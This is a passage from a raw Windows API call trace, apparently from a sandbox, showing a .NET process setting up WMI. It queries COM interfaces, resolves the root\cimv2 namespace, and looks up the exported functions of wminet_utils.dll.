[7]=0x49)), ppvObject=0x482ea2c | out: ppvObject=0x482ea2c*=0x0) returned 0x80004002 [0183.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x593398, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x482e9dc | out: ppvObject=0x482e9dc*=0x0) returned 0x80004002 [0183.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x593398, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x482e9e8 | out: ppvObject=0x482e9e8*=0x5a5f88) returned 0x0 [0183.065] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5a5f88, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x482e9f0 | out: pCid=0x482e9f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0183.065] WbemDefPath:IUnknown:Release (This=0x5a5f88) returned 0x3 [0183.066] CoGetContextToken (in: pToken=0x482ea48 | out: pToken=0x482ea48) returned 0x0 [0183.067] CoGetContextToken (in: pToken=0x482ee50 | out: pToken=0x482ee50) returned 0x0 [0183.067] WbemDefPath:IUnknown:QueryInterface (in: This=0x593398, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x482eee0 | out: ppvObject=0x482eee0*=0x0) returned 0x80004002 [0183.067] WbemDefPath:IUnknown:Release (This=0x593398) returned 0x2 [0183.067] WbemDefPath:IUnknown:Release (This=0x593398) returned 0x1 [0183.068] SetEvent (hEvent=0x2d8) returned 1 Thread: id = 134 os_tid = 0x1224 Thread: id = 135 os_tid = 0x1228 Thread: id = 136 os_tid = 0x122c Thread: id = 137 os_tid = 0x1238 [0183.219] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0183.219] RoInitialize () returned 0x1 [0183.219] RoUninitialize () returned 0x0 [0183.220] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x4caf7fc | out: lpiid=0x4caf7fc) returned 0x0 [0183.221] CoGetClassObject (in: rclsid=0x5a1dcc*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6cc354e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4caf510 | out: ppv=0x4caf510*=0x5b8bc0) returned 0x0 [0183.230] WbemLocator:IUnknown:QueryInterface (in: This=0x5b8bc0, riid=0x6cbe95e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4caf728 | out: ppvObject=0x4caf728*=0x0) returned 0x80004002 [0183.231] WbemLocator:IClassFactory:CreateInstance (in: This=0x5b8bc0, pUnkOuter=0x0, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caf73c | out: ppvObject=0x4caf73c*=0x5a8018) returned 0x0 [0183.231] WbemLocator:IUnknown:Release (This=0x5b8bc0) returned 0x0 [0183.231] WbemLocator:IUnknown:QueryInterface (in: This=0x5a8018, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caf35c | out: ppvObject=0x4caf35c*=0x5a8018) returned 0x0 [0183.231] WbemLocator:IUnknown:QueryInterface (in: This=0x5a8018, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4caf318 | out: ppvObject=0x4caf318*=0x0) returned 0x80004002 [0183.231] WbemLocator:IUnknown:QueryInterface (in: This=0x5a8018, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4caef0c | out: ppvObject=0x4caef0c*=0x0) returned 0x80004002 [0183.232] WbemLocator:IUnknown:AddRef (This=0x5a8018) returned 0x3 [0183.232] WbemLocator:IUnknown:QueryInterface (in: This=0x5a8018, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4caec74 | out: ppvObject=0x4caec74*=0x0) returned 0x80004002 [0183.232] WbemLocator:IUnknown:QueryInterface (in: This=0x5a8018, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4caec24 | out: ppvObject=0x4caec24*=0x0) returned 0x80004002 [0183.232] WbemLocator:IUnknown:QueryInterface (in: This=0x5a8018, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caec30 | out: ppvObject=0x4caec30*=0x0) returned 0x80004002 [0183.232] CoGetContextToken (in: pToken=0x4caec90 | out: pToken=0x4caec90) returned 0x0 [0183.232] CoGetObjectContext (in: riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5b8a2c | out: ppv=0x5b8a2c*=0x580220) returned 0x0 [0183.234] CoGetContextToken (in: pToken=0x4caf098 | out: pToken=0x4caf098) returned 0x0 [0183.234] WbemLocator:IUnknown:QueryInterface (in: This=0x5a8018, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caf128 | out: ppvObject=0x4caf128*=0x0) returned 0x80004002 [0183.234] WbemLocator:IUnknown:Release (This=0x5a8018) returned 0x2 [0183.234] WbemLocator:IUnknown:Release (This=0x5a8018) returned 0x1 [0183.235] CoGetContextToken (in: pToken=0x4caf708 | out: pToken=0x4caf708) returned 0x0 [0183.235] CoGetContextToken (in: pToken=0x4caf668 | out: pToken=0x4caf668) returned 0x0 [0183.235] WbemLocator:IUnknown:QueryInterface (in: This=0x5a8018, riid=0x4caf738*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x4caf734 | out: ppvObject=0x4caf734*=0x5a8018) returned 0x0 [0183.235] WbemLocator:IUnknown:AddRef (This=0x5a8018) returned 0x3 [0183.236] WbemLocator:IUnknown:Release (This=0x5a8018) returned 0x2 [0183.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593398, puCount=0x4caf8cc | out: puCount=0x4caf8cc*=0x2) returned 0x0 [0183.240] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=8, puBuffLength=0x4caf8c8*=0x0, pszText=0x0 | out: puBuffLength=0x4caf8c8*=0xf, pszText=0x0) returned 0x0 [0183.241] WbemDefPath:IWbemPath:GetText (in: This=0x593398, lFlags=8, puBuffLength=0x4caf8c8*=0xf, pszText="00000000000000" | out: puBuffLength=0x4caf8c8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0183.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x4caeb4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0183.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x4caf050, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0183.262] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x6c220000 [0183.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x4caf084, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1a\x06i\r_+_ «·lHóÊ\x04\x88\x8d[", lpUsedDefaultChar=0x0) returned 13 [0183.270] GetProcAddress (hModule=0x6c220000, lpProcName="ResetSecurity") returned 0x6c2226fe [0183.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x4caf084, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0183.283] GetProcAddress (hModule=0x6c220000, lpProcName="SetSecurity") returned 0x6c222740 [0183.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x4caf080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 18 [0183.300] GetProcAddress (hModule=0x6c220000, lpProcName="BlessIWbemServices") returned 0x6c221e89 [0183.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x4caf078, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 24 [0183.346] GetProcAddress (hModule=0x6c220000, lpProcName="BlessIWbemServicesObject") returned 0x6c221edb [0183.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x4caf080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 17 [0183.395] GetProcAddress (hModule=0x6c220000, lpProcName="GetPropertyHandle") returned 0x6c2223d4 [0183.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x4caf080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 18 [0183.417] GetProcAddress (hModule=0x6c220000, lpProcName="WritePropertyValue") returned 0x6c222837 [0183.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x4caf08c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 5 [0183.438] GetProcAddress (hModule=0x6c220000, lpProcName="Clone") returned 0x6c221f2d [0183.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x4caf080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0183.461] GetProcAddress (hModule=0x6c220000, lpProcName="VerifyClientKey") returned 0x6c2227d4 [0183.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x4caf080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0183.475] GetProcAddress (hModule=0x6c220000, lpProcName="GetQualifierSet") returned 0x6c222435 [0183.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x4caf08c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0183.480] GetProcAddress (hModule=0x6c220000, lpProcName="Get") returned 0x6c2222f4 [0183.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x4caf08c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0183.549] GetProcAddress (hModule=0x6c220000, lpProcName="Put") returned 0x6c2224de [0183.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x4caf08c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 6 [0183.597] GetProcAddress (hModule=0x6c220000, lpProcName="Delete") returned 0x6c222151 [0183.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x4caf088, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNamesD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 8 [0183.700] GetProcAddress (hModule=0x6c220000, lpProcName="GetNames") returned 0x6c2223a2 [0183.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x4caf080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumerationD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 16 [0183.841] GetProcAddress (hModule=0x6c220000, lpProcName="BeginEnumeration") returned 0x6c221e63 [0183.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x4caf08c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 4 [0183.863] GetProcAddress (hModule=0x6c220000, lpProcName="Next") returned 0x6c2224a3 [0183.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x4caf084, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 14 [0183.899] GetProcAddress (hModule=0x6c220000, lpProcName="EndEnumeration") returned 0x6c2221e2 [0183.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x4caf078, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0183.912] GetProcAddress (hModule=0x6c220000, lpProcName="GetPropertyQualifierSet") returned 0x6c22241f [0183.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x4caf08c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 5 [0183.932] GetProcAddress (hModule=0x6c220000, lpProcName="Clone") returned 0x6c221f2d [0183.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x4caf084, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 13 [0183.936] GetProcAddress (hModule=0x6c220000, lpProcName="GetObjectText") returned 0x6c2223be [0183.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x4caf080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 17 [0183.955] GetProcAddress (hModule=0x6c220000, lpProcName="SpawnDerivedClass") returned 0x6c222786 [0183.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x4caf084, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 13 [0183.973] GetProcAddress (hModule=0x6c220000, lpProcName="SpawnInstance") returned 0x6c22279c [0183.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x4caf088, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 9 [0183.989] GetProcAddress (hModule=0x6c220000, lpProcName="CompareTo") returned 0x6c221fad [0184.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x4caf080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 17 [0184.006] GetProcAddress (hModule=0x6c220000, lpProcName="GetPropertyOrigin") returned 0x6c222409 [0184.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x4caf084, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFromD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 12 [0184.032] GetProcAddress (hModule=0x6c220000, lpProcName="InheritsFrom") returned 0x6c222448 [0184.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x4caf088, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethod\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 9 [0184.034] GetProcAddress (hModule=0x6c220000, lpProcName="GetMethod") returned 0x6c22235a [0184.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x4caf088, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 9 [0184.057] GetProcAddress (hModule=0x6c220000, lpProcName="PutMethod") returned 0x6c2225fa [0184.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x4caf084, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethodD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 12 [0184.084] GetProcAddress (hModule=0x6c220000, lpProcName="DeleteMethod") returned 0x6c222164 [0184.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x4caf07c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumeration\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 22 [0184.088] GetProcAddress (hModule=0x6c220000, lpProcName="BeginMethodEnumeration") returned 0x6c221e76 [0184.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x4caf088, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethod\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 10 [0184.091] GetProcAddress (hModule=0x6c220000, lpProcName="NextMethod") returned 0x6c2224c2 [0184.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x4caf07c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumerationD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 20 [0184.114] GetProcAddress (hModule=0x6c220000, lpProcName="EndMethodEnumeration") returned 0x6c2221f2 [0184.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x4caf07c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSet\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 21 [0184.116] GetProcAddress (hModule=0x6c220000, lpProcName="GetMethodQualifierSet") returned 0x6c22238c [0184.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x4caf080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0184.119] GetProcAddress (hModule=0x6c220000, lpProcName="GetMethodOrigin") returned 0x6c222376 [0184.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x4caf080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 16 [0184.122] GetProcAddress (hModule=0x6c220000, lpProcName="QualifierSet_Get") returned 0x6c22264c [0184.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x4caf080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_PutD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 16 [0184.152] GetProcAddress (hModule=0x6c220000, lpProcName="QualifierSet_Put") returned 0x6c22269a [0184.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x4caf07c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0184.191] GetProcAddress (hModule=0x6c220000, lpProcName="QualifierSet_Delete") returned 0x6c222629 [0184.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x4caf07c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNames\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 21 [0184.192] GetProcAddress (hModule=0x6c220000, lpProcName="QualifierSet_GetNames") returned 0x6c222668 [0184.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x4caf074, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 29 [0184.215] GetProcAddress (hModule=0x6c220000, lpProcName="QualifierSet_BeginEnumeration") returned 0x6c222616 [0184.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x4caf080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Next\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 17 [0184.217] GetProcAddress (hModule=0x6c220000, lpProcName="QualifierSet_Next") returned 0x6c22267e [0184.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x4caf074, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0184.243] GetProcAddress (hModule=0x6c220000, lpProcName="QualifierSet_EndEnumeration") returned 0x6c22263c [0184.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x4caf078, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0184.246] GetProcAddress (hModule=0x6c220000, lpProcName="GetCurrentApartmentType") returned 0x6c222435 [0184.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x4caf07c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStubD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 20 [0184.267] GetProcAddress (hModule=0x6c220000, lpProcName="GetDemultiplexedStub") returned 0x6c222313 [0184.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x4caf07c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 21 [0184.311] GetProcAddress (hModule=0x6c220000, lpProcName="CreateInstanceEnumWmi") returned 0x6c2220db [0184.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x4caf080, cbMultiByte=20, 